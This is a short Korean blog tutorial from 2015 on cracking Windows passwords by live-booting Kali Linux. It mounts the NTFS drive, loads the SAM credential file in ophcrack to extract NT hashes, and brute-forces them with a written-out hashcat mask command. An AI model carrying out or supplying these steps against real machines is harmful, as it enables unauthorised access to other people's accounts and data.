Cracking Windows Password Hash with Kali linux Live Booting
|2015. 8. 22. 13:47
Kali linux USB Live Booting
#blkid ;를 통하여 장치확인
#mkdir /media/hdd ; 임시로 마운트 시킬 디렉터리를 생성
#mount /dev/sda1 /media/hdd ; 이 경우 장치 이름이 sda1 // NTFS 라는 단어를 통해 찾으면 된다.
ophcrack > Load > Encrypted SAM > C:\Windows\System32\config Open
NT Hash 값을 따로 메모장에 적어주고 *.hash 라고 저장해준다. ex)win.hash
#hashcat -m 1000 -a 3 win.hash ?a?d?l?s?a?a?a
자세한 사용방법은 --help를 통해 확인하는 것이 좋다.
출처
https://www.youtube.com/watch?v=4EgYRxeFxbY // 스무디 TV
'Hacking > System Hacking' 카테고리의 다른 글
FTZ Level20 //FSB (0) | 2015.05.31 |
---|---|
FTZ Level19 //Chaining RTL Calls (0) | 2015.05.28 |
FTZ Level18 (0) | 2015.05.25 |
FTZ Level17 (0) | 2015.05.24 |
FTZ Level16 (0) | 2015.05.22 |